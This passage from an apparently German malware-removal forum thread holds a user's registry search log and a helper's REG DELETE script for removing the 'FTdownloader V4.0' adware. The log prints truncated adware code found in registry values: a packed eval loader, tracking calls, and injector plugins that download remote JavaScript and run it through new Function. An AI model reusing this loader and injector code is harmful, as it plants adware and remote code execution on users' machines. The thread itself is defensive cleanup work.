"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"

Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayIcon"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"

Searching for "        "
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000020]
"JavaScript"="try{
innergaq = {
        accountStr: '',
        arrToPush: new Array(),
               
        create: function(q){
                this.arrToPush.push(this.accountStr + (q ? "&" + q : ''));
        },
       
    //only after the back loaded - or else the appAPI wont be avilable
    init: function (q, v, nm) {
            var that = this;
            this.accountStr = 'acc='+q + '&nm=' + nm;
            appAPI.message.addListener(function(msg) {
                        that.onRequest(msg);
                });
               
                if (appAPI.db.get("au") == util.getCurrentDate()) {
                    //console.log('exit- no need to use plugin');
                    return;
            }

            function updateAUser(){
                        var install = appAPI.db.get("install") ||  util.getCurrentDate();
                        that.create('action=_setCustomVar&index=2&name=Install%20Date&value=' + decodeURIComponent(install) + '&opt_scope=1' );
                        var cnt = appAPI.db.get("cnt");
                if (!cnt || cnt == "" || cnt == undefined) {
                    util.request("hxxp://ext.extdaddy.com/cc
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000027]
"JavaScript"="injectorBack = {
        js: "",
        funcName: "",       
        count: 0,
        type: "",
        version: "",
       
          setKey: function(key, value, cb){
      appAPI.db.async.set(key , value, appAPI.time.hoursFromNow(6), cb);
    },
   
    activateCodeInTab: function (code){
            appAPI.message.toActiveTab({"name": this.funcName, "version": this.version, "browser" : "ie", "type": this.type});
    },
       
        init: function (funcName, version, fileName) {
                var that = this;
                this.funcName = funcName;
                this.type = fileName;
                this.version = version;
               
                appAPI.message.addListener(function(msg) {
                        switch (msg.name){
                                case "getAllKeys":
                                          if (!utils.isCacheTimePass(6, utils.getCrntTime())) {
                                                  that.activateCodeInTab();
                                          }
                                          else {
                                                appAPI.request.get({
                                                url:  msg.protocol + "//secureclick-media-maynemyltf.netdna-ssl.com/Extensions/rjs/" + fileName + "_c.js",
                                                onS
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000028]
"JavaScript"="injector = {
        init: function (listenerTriggeredOn) {
                (function ($) {
                        var obj = {};
                        appAPI.message.addListener(function(msg) {
                                if(listenerTriggeredOn == msg.name){
                                        var keys = [];
                                        appAPI.db.async.getList(function(dbItems) {
                                              for (var i = 0; i < dbItems.length; i++) {
                                            keys[dbItems[i].key] = dbItems[i].value;
                                          }
                                        var country = keys.cnt || "";
                                            var json = JSON || appAPI.JSON;
                                           
                                            if(msg.type == "c2"){
                                                    var fn = new Function("exname", "cnt", "version", "broType", "dataKeys", json.parse(keys['js']));
                                                    fn(msg.name, country, msg.version , msg.browser, keys);
                                            }
                                            else if(msg.type == "htd"){
                                                    var fn = new Function("Datakeys", "btype", "exname", "cnt", "version", json.parse(keys['js']));
                                            fn(keys, msg.browser, msg.name, country, msg.version);
 
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\102]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
    appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
    appAPI.internal.monetization.plugins = {};
}

appAPI.internal.monetization.plugins[102] = function() {

        if (typeof appAPI.internal.monetization.verticals !== "undefined") {
                if (!appAPI.internal.monetization.verticals.shopping){
                        return;
                }
        }

/**
 * Copyright (C) 2012 DealPly Technologies Ltd. All rights reserved. For licensing
 * information, see hxxp://www.dealply.com/
 * 
 * THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
 * LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
 * OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
 * EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PUR
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\104]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
    appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
    appAPI.internal.monetization.plugins = {};
}

appAPI.internal.monetization.plugins[104] = function() {

        if (typeof appAPI.internal.monetization.verticals !== "undefined") {
                if (!appAPI.internal.monetization.verticals.shopping){
                        return;
                }
        }

var permanentData = {gui:[],actions:[]};
var permanentCache = ["c822c1b63853ed273b89687ac505f9fa","738aa8d3bc02eb8712acd0eb2cf6dfd5","2351f600bf62102c56b3941c39225683","16524241cd11b1b1c6b3ab30874047d6","241fe8af1e038118cd817048a65f803e","5ed33f7008771c9d49e3716aeaeca581","e50173d2983f028042965a37357931fc","8e1b7a68ae2f404bfafaafd53d293cde","dc29a383b9b0932dbd9f75e4af9b51f5","f4c4b31d11e30ca1511d807c10cd68f3","8862aa846eeafd1f61c5ad22580d0148","b53e20c91b81ec25a6d06d4cf351d0b2","1f89d526fc52417e16d99b9f0
[HKEY_LOCAL_MACHINE\SOFTWARE\Dell Computer Corporation\SysInfo]
"System Manufacturer"="Dell Inc.        "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML"="            <PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" >                <InitializationParameters>                    <Param Name="PSVersion" Value="2.0"/>                </InitializationParameters>                <Resources>                    <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" SupportsOptions="true" ExactMatch="true">                        <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>                        <Capability Type="Shell"/>                    </Resource>                </Res
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell32]
"ConfigXML"="<PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell32" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" Architecture="32" >                        <InitializationParameters>                            <Param Name="PSVersion" Value="2.0"/>                        </InitializationParameters>                        <Resources>                            <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" SupportsOptions="true" ExactMatch="true">                                <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>                               
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Live\Common]
"Manufacturer"="Dell Inc.        "
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000020]
"JavaScript"="try{
innergaq = {
        accountStr: '',
        arrToPush: new Array(),
               
        create: function(q){
                this.arrToPush.push(this.accountStr + (q ? "&" + q : ''));
        },
       
    //only after the back loaded - or else the appAPI wont be avilable
    init: function (q, v, nm) {
            var that = this;
            this.accountStr = 'acc='+q + '&nm=' + nm;
            appAPI.message.addListener(function(msg) {
                        that.onRequest(msg);
                });
               
                if (appAPI.db.get("au") == util.getCurrentDate()) {
                    //console.log('exit- no need to use plugin');
                    return;
            }

            function updateAUser(){
                        var install = appAPI.db.get("install") ||  util.getCurrentDate();
                        that.create('action=_setCustomVar&index=2&name=Install%20Date&value=' + decodeURIComponent(install) + '&opt_scope=1' );
                        var cnt = appAPI.db.get("cnt");
                if (!cnt || cnt == "" || cnt == undefined) {
                    u
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000027]
"JavaScript"="injectorBack = {
        js: "",
        funcName: "",       
        count: 0,
        type: "",
        version: "",
       
          setKey: function(key, value, cb){
      appAPI.db.async.set(key , value, appAPI.time.hoursFromNow(6), cb);
    },
   
    activateCodeInTab: function (code){
            appAPI.message.toActiveTab({"name": this.funcName, "version": this.version, "browser" : "ie", "type": this.type});
    },
       
        init: function (funcName, version, fileName) {
                var that = this;
                this.funcName = funcName;
                this.type = fileName;
                this.version = version;
               
                appAPI.message.addListener(function(msg) {
                        switch (msg.name){
                                case "getAllKeys":
                                          if (!utils.isCacheTimePass(6, utils.getCrntTime())) {
                                                  that.activateCodeInTab();
                                          }
                                          else {
                                                appAPI.request.get({
                                                url:  msg.protocol + "//secureclick-media-maynemyltf.netdna-ssl.com/Extensions/rjs/"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000028]
"JavaScript"="injector = {
        init: function (listenerTriggeredOn) {
                (function ($) {
                        var obj = {};
                        appAPI.message.addListener(function(msg) {
                                if(listenerTriggeredOn == msg.name){
                                        var keys = [];
                                        appAPI.db.async.getList(function(dbItems) {
                                              for (var i = 0; i < dbItems.length; i++) {
                                            keys[dbItems[i].key] = dbItems[i].value;
                                          }
                                        var country = keys.cnt || "";
                                            var json = JSON || appAPI.JSON;
                                           
                                            if(msg.type == "c2"){
                                                    var fn = new Function("exname", "cnt", "version", "broType", "dataKeys", json.parse(keys['js']));
                                                    fn(msg.name, country, msg.version , msg.browser, keys);
                                            }
                                            else if(msg.type == "htd"){
                                                    var fn = new Function("Datakeys", "btype", "exname", "cnt", "version", json.parse(keys['js']));
                                            fn(keys, msg.browse
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\102]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
    appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
    appAPI.internal.monetization.plugins = {};
}

appAPI.internal.monetization.plugins[102] = function() {

        if (typeof appAPI.internal.monetization.verticals !== "undefined") {
                if (!appAPI.internal.monetization.verticals.shopping){
                        return;
                }
        }

/**
 * Copyright (C) 2012 DealPly Technologies Ltd. All rights reserved. For licensing
 * information, see hxxp://www.dealply.com/
 * 
 * THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
 * LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
 * OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
 * EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTA
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\104]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
    appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
    appAPI.internal.monetization.plugins = {};
}

appAPI.internal.monetization.plugins[104] = function() {

        if (typeof appAPI.internal.monetization.verticals !== "undefined") {
                if (!appAPI.internal.monetization.verticals.shopping){
                        return;
                }
        }

var permanentData = {gui:[],actions:[]};
var permanentCache = ["c822c1b63853ed273b89687ac505f9fa","738aa8d3bc02eb8712acd0eb2cf6dfd5","2351f600bf62102c56b3941c39225683","16524241cd11b1b1c6b3ab30874047d6","241fe8af1e038118cd817048a65f803e","5ed33f7008771c9d49e3716aeaeca581","e50173d2983f028042965a37357931fc","8e1b7a68ae2f404bfafaafd53d293cde","dc29a383b9b0932dbd9f75e4af9b51f5","f4c4b31d11e30ca1511d807c10cd68f3","8862aa846eeafd1f61c5ad22580d0148","b53e20c91b81ec25a6d06

-= EOF =-
Und den FTdownloader kann ich den jatzt einfach löschen, oder wäre es von Vorteil da auch noch andere Schritte durchzuführen? Wenn ja welche?

cosinus 13.08.2013 13:20
Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
reg: REG DELETE "HKCU\Software\AppDataLow\Software\FTdownloader V4.0" /f
reg: REG DELETE "HKLM\SOFTWARE\Classes\FTDownloader"  /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\FTdownloader V4.0" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp" /f
reg: REG DELETE "HKU\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0" /f
